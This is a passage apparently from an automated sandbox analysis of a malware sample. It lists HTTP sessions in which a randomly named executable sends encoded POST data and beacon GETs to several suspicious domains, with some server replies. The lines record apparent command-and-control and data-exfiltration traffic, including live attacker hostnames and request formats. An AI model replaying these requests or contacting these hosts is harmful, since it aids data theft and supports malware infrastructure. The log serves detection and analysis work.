6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50035	162.0.211.143	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:27:37.927515984 CET	432	OUT	GET /mkt0/?5Js0X=9zex_vxPfbpDzDPp&OrsLbfS8=isbFxoDUwOk3j3xnh/OVPcYsjNUxjmD84LrjxIfJoNaCt3w7XLSNRVY+pjf8GIX6//XCICVb17CzteC5yxbMAUKj5mlhkKSf9B39hvFNgAAh+ecOP0LS1bo= HTTP/1.1 Host: www.nuvisio.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Nov 2, 2024 05:27:38.630820990 CET	548	IN	HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 04:27:38 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50036	76.223.67.189	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:27:43.893969059 CET	710	OUT	POST /b8r1/ HTTP/1.1 Host: www.mjmegartravel.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 205 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.mjmegartravel.online Referer: http://www.mjmegartravel.online/b8r1/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 36 4a 56 49 38 54 54 6d 45 79 4c 62 36 2b 70 4a 69 6d 5a 37 39 78 69 4b 36 6d 53 39 54 34 46 43 4c 36 34 4a 38 44 70 4d 6e 6b 70 4c 6a 74 30 75 35 51 7a 75 50 6e 41 70 51 6b 77 79 53 48 76 58 79 6d 6a 36 4c 73 38 55 63 36 4c 31 39 49 4a 7a 35 62 71 4b 51 30 5a 6a 77 57 56 64 52 4a 6d 49 38 78 65 51 36 69 70 75 31 6e 47 4e 4f 31 51 59 37 37 38 68 48 51 47 66 44 76 75 42 35 33 46 32 4a 55 30 6f 34 64 50 38 70 31 75 59 4b 2f 77 2f 30 65 35 4e 52 52 37 51 4c 41 46 79 54 6b 45 48 51 69 56 6c 74 48 69 55 41 42 70 75 4a 48 38 41 46 69 6f 6f 48 53 56 6c 7a 59 64 45 4f 4c 58 59 6c 51 3d 3d Data Ascii: OrsLbfS8=6JVI8TTmEyLb6+pJimZ79xiK6mS9T4FCL64J8DpMnkpLjt0u5QzuPnApQkwySHvXymj6Ls8Uc6L19IJz5bqKQ0ZjwWVdRJmI8xeQ6ipu1nGNO1QY778hHQGfDvuB53F2JU0o4dP8p1uYK/w/0e5NRR7QLAFyTkEHQiVltHiUABpuJH8AFiooHSVlzYdEOLXYlQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50037	76.223.67.189	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:27:46.429626942 CET	730	OUT	POST /b8r1/ HTTP/1.1 Host: www.mjmegartravel.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 225 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.mjmegartravel.online Referer: http://www.mjmegartravel.online/b8r1/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 36 4a 56 49 38 54 54 6d 45 79 4c 62 34 65 5a 4a 67 46 78 37 36 52 69 4e 77 47 53 39 61 59 46 47 4c 36 45 4a 38 47 4a 63 6e 33 4e 4c 69 4d 45 75 34 53 62 75 44 48 41 70 49 30 78 34 64 6e 76 4d 79 68 72 49 4c 70 45 55 63 36 33 31 39 4d 4e 7a 35 6f 43 4a 52 6b 5a 6c 38 32 56 66 65 70 6d 49 38 78 65 51 36 69 38 42 31 6d 69 4e 4f 46 67 59 70 50 49 2b 4e 77 47 63 55 66 75 42 39 33 46 79 4a 55 30 65 34 63 6a 57 70 33 6d 59 4b 2f 41 2f 78 62 4e 4f 66 52 37 61 50 41 45 4c 64 6c 78 65 63 7a 64 72 6f 55 75 4f 42 6b 4e 51 49 42 78 61 55 54 4a 2f 56 53 78 57 75 66 55 77 44 49 71 52 2b 54 73 75 46 51 76 52 6b 2b 31 65 79 2b 52 79 38 6e 78 4b 77 45 4d 3d Data Ascii: OrsLbfS8=6JVI8TTmEyLb4eZJgFx76RiNwGS9aYFGL6EJ8GJcn3NLiMEu4SbuDHApI0x4dnvMyhrILpEUc6319MNz5oCJRkZl82VfepmI8xeQ6i8B1miNOFgYpPI+NwGcUfuB93FyJU0e4cjWp3mYK/A/xbNOfR7aPAELdlxeczdroUuOBkNQIBxaUTJ/VSxWufUwDIqR+TsuFQvRk+1ey+Ry8nxKwEM=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50038	76.223.67.189	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:27:48.984381914 CET	10812	OUT	POST /b8r1/ HTTP/1.1 Host: www.mjmegartravel.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 10305 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.mjmegartravel.online Referer: http://www.mjmegartravel.online/b8r1/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 36 4a 56 49 38 54 54 6d 45 79 4c 62 34 65 5a 4a 67 46 78 37 36 52 69 4e 77 47 53 39 61 59 46 47 4c 36 45 4a 38 47 4a 63 6e 33 46 4c 6a 2f 63 75 34 31 48 75 4e 6e 41 70 57 6b 78 35 64 6e 75 65 79 67 50 4d 4c 6f 34 75 63 38 37 31 76 2f 46 7a 78 35 43 4a 66 6b 5a 6c 30 57 56 65 52 4a 6d 64 38 78 4f 55 36 69 73 42 31 6d 69 4e 4f 44 6b 59 35 4c 38 2b 43 51 47 66 44 76 75 46 35 33 46 61 4a 55 73 4f 34 63 6d 6a 70 45 65 59 4b 66 51 2f 7a 4a 6c 4f 54 52 37 63 49 41 45 36 64 6c 74 37 63 33 30 55 6f 58 79 77 42 69 78 51 49 67 6f 65 4a 6a 30 67 44 42 67 49 2b 65 68 62 47 59 43 48 2b 52 77 48 42 52 50 49 6b 73 68 4b 31 74 42 38 73 55 6c 63 69 54 57 64 30 77 6b 42 51 43 47 62 38 67 67 49 66 71 6e 4d 70 77 4e 30 35 70 36 4d 56 68 48 79 44 4e 78 6e 38 2f 6c 2f 58 55 57 7a 78 78 69 65 53 42 55 48 4c 74 79 43 50 77 44 43 64 61 39 57 39 56 51 7a 78 38 58 68 34 6e 2b 49 43 32 66 41 58 55 54 46 6b 50 58 4d 6e 78 6e 45 2f 4d 6f 7a 74 74 72 67 53 4e 5a 4e 71 51 49 4c 45 76 4e 66 71 66 77 49 2f [TRUNCATED] Data Ascii: OrsLbfS8=6JVI8TTmEyLb4eZJgFx76RiNwGS9aYFGL6EJ8GJcn3FLj/cu41HuNnApWkx5dnueygPMLo4uc871v/Fzx5CJfkZl0WVeRJmd8xOU6isB1miNODkY5L8+CQGfDvuF53FaJUsO4cmjpEeYKfQ/zJlOTR7cIAE6dlt7c30UoXywBixQIgoeJj0gDBgI+ehbGYCH+RwHBRPIkshK1tB8sUlciTWd0wkBQCGb8ggIfqnMpwN05p6MVhHyDNxn8/l/XUWzxxieSBUHLtyCPwDCda9W9VQzx8Xh4n+IC2fAXUTFkPXMnxnE/MozttrgSNZNqQILEvNfqfwI/eGfHBVh3PJvaRHUpeH1okxpesfnAIPxfrGwYXspymDHxwOg7ATyGfUh+W9mv0F8JppwFh9RESZPukMA2+pt5JBBrklAv3aye4iDqrcN7OdFEme8PPOADDTxW/FHmBmjQEZnPxKa7wbn1S65sqKMpYdZ2x7jOeRMccOt82M7Ygn+1nPB1wv5abocFU8Fa7PeQeqXIcVL0OrqX/tAdzzbOIjPSgkgaGbDrwLmaGON1wCWiGvSZoHIPzf+eWzr0JmFrhCEYxIvN50mxHrEC0RkiOQhJeM64qM6SH8QTExQ1B93cTo0EodX3Rro26yOQyvCpcb6MtteCy61kia+m+vfsSQgq3WhZ48TM0Jsk3Z7Ra0PlmXToz3sI22fFRMxmLvG/R22p2VENUY1YSKmCQmxV8Zn2TTccjdOq3bqCS/AduD+j8/QZAJJgBLyDFWgpcGRz9K0doDdch2rQG9037bSXQsWeMXjk1KjN5q+kK/iYAgQJOTzG3dXMMb+Ydou533zQXZDlkiMXu8TCUnS8jpLCW8kvr9sDGQX3nNQZQK01O03BKXOhao6aHgu8IvH/rv2wl9nQJvWNwr5A3hbOyNBCMXHnmN11mFXYfX81lwtMeT8TtDaHXRz8ddhQW6ciZ1wWBcxA5wqKxc65LNCPr0JPO2hiVjMnGSsXKh [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50039	76.223.67.189	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:27:51.524365902 CET	441	OUT	GET /b8r1/?OrsLbfS8=3L9o/mnND0P50Zs/rEVx+Tqc8Fn9XYBSc70e9GxS51tZs+FA1xnTHiNXLhJNSDrOiW73WMsPSvDz7sty9+eRPk0x9j1tfIyp/CKdkiUZ5xeLRHsV/7I5DTY=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1 Host: www.mjmegartravel.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Nov 2, 2024 05:27:52.170016050 CET	407	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 02 Nov 2024 04:27:52 GMT Content-Type: text/html Content-Length: 267 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4f 72 73 4c 62 66 53 38 3d 33 4c 39 6f 2f 6d 6e 4e 44 30 50 35 30 5a 73 2f 72 45 56 78 2b 54 71 63 38 46 6e 39 58 59 42 53 63 37 30 65 39 47 78 53 35 31 74 5a 73 2b 46 41 31 78 6e 54 48 69 4e 58 4c 68 4a 4e 53 44 72 4f 69 57 37 33 57 4d 73 50 53 76 44 7a 37 73 74 79 39 2b 65 52 50 6b 30 78 39 6a 31 74 66 49 79 70 2f 43 4b 64 6b 69 55 5a 35 78 65 4c 52 48 73 56 2f 37 49 35 44 54 59 3d 26 35 4a 73 30 58 3d 39 7a 65 78 5f 76 78 50 66 62 70 44 7a 44 50 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?OrsLbfS8=3L9o/mnND0P50Zs/rEVx+Tqc8Fn9XYBSc70e9GxS51tZs+FA1xnTHiNXLhJNSDrOiW73WMsPSvDz7sty9+eRPk0x9j1tfIyp/CKdkiUZ5xeLRHsV/7I5DTY=&5Js0X=9zex_vxPfbpDzDPp"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50040	13.248.169.48	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:02.354532957 CET	695	OUT	POST /f1ri/ HTTP/1.1 Host: www.thesquare.world Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 205 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.thesquare.world Referer: http://www.thesquare.world/f1ri/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 6c 4f 4f 2b 48 55 75 53 6e 45 39 43 41 36 2b 38 5a 79 6a 6c 7a 70 56 69 4f 6d 4e 78 34 44 44 33 38 6b 43 49 6c 6c 2f 4f 2f 43 59 77 6d 4e 33 66 6f 49 6e 41 66 30 6d 52 49 79 35 46 66 67 59 72 75 56 48 78 44 49 4d 69 35 47 42 4a 2b 61 4c 58 31 7a 4c 57 70 79 64 7a 64 74 2f 47 57 52 53 6c 4f 48 37 54 43 4d 7a 4e 2f 69 75 65 4a 69 46 33 33 4e 50 65 48 69 36 4f 4f 5a 6e 56 64 44 59 50 2b 6b 36 58 2f 33 35 52 53 41 43 79 30 33 36 65 73 58 43 30 74 34 6d 6a 66 7a 32 7a 50 33 6d 59 6b 56 43 6f 35 30 57 55 65 46 42 37 6a 6a 42 44 75 2f 65 5a 5a 78 4b 67 59 6b 75 4f 73 56 64 78 43 41 3d 3d Data Ascii: OrsLbfS8=lOO+HUuSnE9CA6+8ZyjlzpViOmNx4DD38kCIll/O/CYwmN3foInAf0mRIy5FfgYruVHxDIMi5GBJ+aLX1zLWpydzdt/GWRSlOH7TCMzN/iueJiF33NPeHi6OOZnVdDYP+k6X/35RSACy036esXC0t4mjfz2zP3mYkVCo50WUeFB7jjBDu/eZZxKgYkuOsVdxCA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50041	13.248.169.48	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:04.904582024 CET	715	OUT	POST /f1ri/ HTTP/1.1 Host: www.thesquare.world Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 225 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.thesquare.world Referer: http://www.thesquare.world/f1ri/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 6c 4f 4f 2b 48 55 75 53 6e 45 39 43 41 5a 32 38 65 52 37 6c 6b 5a 56 68 4c 6d 4e 78 68 54 44 37 38 6b 47 49 6c 6e 54 65 2f 30 49 77 6c 75 6a 66 70 4e 54 41 59 30 6d 52 63 43 34 50 52 41 59 30 75 53 4f 45 44 4d 4d 69 35 48 6c 4a 2b 61 62 58 32 45 66 58 71 43 64 78 56 4e 2f 45 62 78 53 6c 4f 48 37 54 43 4d 50 72 2f 69 47 65 4a 78 64 33 74 73 50 64 59 53 36 4e 47 35 6e 56 5a 44 59 54 2b 6b 36 50 2f 31 64 2f 53 43 71 79 30 79 57 65 74 43 75 33 6a 49 6d 68 41 6a 32 6a 4a 57 48 77 6c 46 4c 72 77 30 47 64 51 47 78 69 72 46 4d 5a 2f 4f 2f 4f 4c 78 75 54 46 6a 6e 36 68 57 67 34 5a 50 62 78 4f 37 66 5a 4a 2b 36 36 6d 45 51 6c 30 6c 45 72 34 55 38 3d Data Ascii: OrsLbfS8=lOO+HUuSnE9CAZ28eR7lkZVhLmNxhTD78kGIlnTe/0IwlujfpNTAY0mRcC4PRAY0uSOEDMMi5HlJ+abX2EfXqCdxVN/EbxSlOH7TCMPr/iGeJxd3tsPdYS6NG5nVZDYT+k6P/1d/SCqy0yWetCu3jImhAj2jJWHwlFLrw0GdQGxirFMZ/O/OLxuTFjn6hWg4ZPbxO7fZJ+66mEQl0lEr4U8=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50042	13.248.169.48	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:07.452411890 CET	10797	OUT	POST /f1ri/ HTTP/1.1 Host: www.thesquare.world Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 10305 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.thesquare.world Referer: http://www.thesquare.world/f1ri/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 6c 4f 4f 2b 48 55 75 53 6e 45 39 43 41 5a 32 38 65 52 37 6c 6b 5a 56 68 4c 6d 4e 78 68 54 44 37 38 6b 47 49 6c 6e 54 65 2f 30 41 77 6c 63 37 66 70 71 2f 41 5a 30 6d 52 66 43 34 4f 52 41 59 39 75 54 71 66 44 4d 4a 41 35 45 4e 4a 2f 38 58 58 39 52 7a 58 78 79 64 78 58 4e 2f 46 57 52 53 38 4f 48 4c 66 43 4d 2f 72 2f 69 47 65 4a 32 6c 33 37 74 50 64 4c 43 36 4f 4f 5a 6e 76 64 44 59 76 2b 6b 79 66 2f 31 5a 42 53 7a 4b 79 30 54 36 65 71 30 36 33 68 6f 6d 76 44 6a 33 38 4a 57 4c 76 6c 46 58 42 77 33 61 6b 51 42 42 69 70 69 64 52 74 4e 6e 34 63 53 53 35 51 43 50 72 34 33 45 6e 58 4e 72 34 47 2b 37 6d 61 4f 37 57 6b 48 74 52 6b 56 73 61 72 79 57 33 64 66 44 33 69 43 37 76 6b 51 48 54 78 61 7a 69 4b 55 32 50 62 70 6e 4b 43 71 35 69 76 62 2b 4c 77 43 78 74 6c 39 72 59 45 78 38 6e 45 54 47 74 7a 52 35 4b 6d 4b 48 38 32 46 48 31 56 55 46 69 35 42 42 76 7a 65 42 47 73 48 72 33 6c 36 6c 78 30 75 61 6e 74 76 51 53 61 43 76 42 64 63 6c 54 66 58 61 68 30 38 77 79 78 46 38 77 30 50 33 36 2f [TRUNCATED] Data Ascii: OrsLbfS8=lOO+HUuSnE9CAZ28eR7lkZVhLmNxhTD78kGIlnTe/0Awlc7fpq/AZ0mRfC4ORAY9uTqfDMJA5ENJ/8XX9RzXxydxXN/FWRS8OHLfCM/r/iGeJ2l37tPdLC6OOZnvdDYv+kyf/1ZBSzKy0T6eq063homvDj38JWLvlFXBw3akQBBipidRtNn4cSS5QCPr43EnXNr4G+7maO7WkHtRkVsaryW3dfD3iC7vkQHTxaziKU2PbpnKCq5ivb+LwCxtl9rYEx8nETGtzR5KmKH82FH1VUFi5BBvzeBGsHr3l6lx0uantvQSaCvBdclTfXah08wyxF8w0P36/eAqP5JyGdDfMDiwv17TRY0Y52Pg561lNdxz/mHNojSxhXPuCLTduzN6+EHtOctccP7mu3wBi8BAvseDos43aFykWGoP8/eC5xYb3/fXnqrG1wh/ms89orpOwgpfQ5iTAwRf97VHCfobTsZvUF9KlVZa7EO+52QpPfprZpQpfpNZjuFaAV33nXc2tT9GNORHH+Sh92SvLIiMTsspOzkh6tj2D8TYATcfIU9hw1MMajhHVm5OI1H0yS2ofVuWYGMsmzPW7iTNlCLIjnNXIpiKfFKsm6a/qOCa9Mdc9Sse6hKQDvYJag9pKhqKJqdzcAuFnbMqhEroB9mQcIxeBXrSHSskPlUotjU6xJeI6Iow5LZUJ+Sn3FWnpNWOGqw3TN8J2K9k7jfaiUDLMwljEHs84BWIQ6U1ke7MvzjQfN0iRof09nqhUbym/TU+z8WuPg2863JOxY/oFZQiOpTOiZNx2kLKU0h1Gf0tm0tXF4HClbaf1DgaP6gVmHw5EBHMd/W+aADX7HPXIE9+V43VzEv4ho92kMoMecRmtnMkPml1nh5aN5JT5xuMHNGUVmz1hDXGqBEnydkOmZJr2HXvMcoFTrTRvXLHvvS4XFO0uZovA6SApOy4nuRYzd3vufUUPwS9OFnNItfKzvYpGuHDidjDnFuHNxxP7jAID0m [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50043	13.248.169.48	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:09.990708113 CET	436	OUT	GET /f1ri/?OrsLbfS8=oMmeEi6GnV1TPfvHfyKeoZR2G2AlgWmF7ByspnTr53JWt+ekrZbBZ03GIH86fGkviFflLcQb0Wtr9Yr8xEO9qCMiTKL2fFCWEg6tMZDOog2eIDJ06fLwNDQ=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1 Host: www.thesquare.world Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Nov 2, 2024 05:28:10.677438974 CET	407	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 02 Nov 2024 04:28:10 GMT Content-Type: text/html Content-Length: 267 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4f 72 73 4c 62 66 53 38 3d 6f 4d 6d 65 45 69 36 47 6e 56 31 54 50 66 76 48 66 79 4b 65 6f 5a 52 32 47 32 41 6c 67 57 6d 46 37 42 79 73 70 6e 54 72 35 33 4a 57 74 2b 65 6b 72 5a 62 42 5a 30 33 47 49 48 38 36 66 47 6b 76 69 46 66 6c 4c 63 51 62 30 57 74 72 39 59 72 38 78 45 4f 39 71 43 4d 69 54 4b 4c 32 66 46 43 57 45 67 36 74 4d 5a 44 4f 6f 67 32 65 49 44 4a 30 36 66 4c 77 4e 44 51 3d 26 35 4a 73 30 58 3d 39 7a 65 78 5f 76 78 50 66 62 70 44 7a 44 50 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?OrsLbfS8=oMmeEi6GnV1TPfvHfyKeoZR2G2AlgWmF7ByspnTr53JWt+ekrZbBZ03GIH86fGkviFflLcQb0Wtr9Yr8xEO9qCMiTKL2fFCWEg6tMZDOog2eIDJ06fLwNDQ=&5Js0X=9zex_vxPfbpDzDPp"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50044	154.23.184.185	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:28:16.368415117 CET	677	OUT	POST /fo10/ HTTP/1.1 Host: www.d21dk.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 205 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.d21dk.top Referer: http://www.d21dk.top/fo10/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 59 45 74 49 6c 4f 65 2b 66 30 52 67 48 75 41 64 32 61 44 62 6a 33 4f 49 4b 62 44 65 35 51 62 73 4e 47 51 47 47 77 4a 74 4c 51 46 64 75 69 77 71 74 36 42 68 6a 77 51 50 65 4e 2b 35 49 42 54 57 73 75 54 59 4e 50 64 65 45 71 70 45 46 75 2f 6e 4a 73 77 6d 5a 67 46 70 58 61 55 76 37 55 79 61 52 78 51 54 6b 45 6d 6e 54 47 59 52 6f 34 52 43 76 38 35 33 43 43 45 72 41 6c 41 72 77 47 63 2f 45 79 42 4f 74 58 71 56 41 51 61 6b 67 6b 4c 69 37 7a 62 50 34 4f 5a 6d 43 57 36 61 74 6a 6c 66 65 61 7a 74 49 46 6b 62 51 58 68 54 74 58 56 62 4b 51 4b 68 57 32 57 62 58 73 65 43 52 48 4a 2f 43 41 3d 3d Data Ascii: OrsLbfS8=YEtIlOe+f0RgHuAd2aDbj3OIKbDe5QbsNGQGGwJtLQFduiwqt6BhjwQPeN+5IBTWsuTYNPdeEqpEFu/nJswmZgFpXaUv7UyaRxQTkEmnTGYRo4RCv853CCErAlArwGc/EyBOtXqVAQakgkLi7zbP4OZmCW6atjlfeaztIFkbQXhTtXVbKQKhW2WbXseCRHJ/CA==
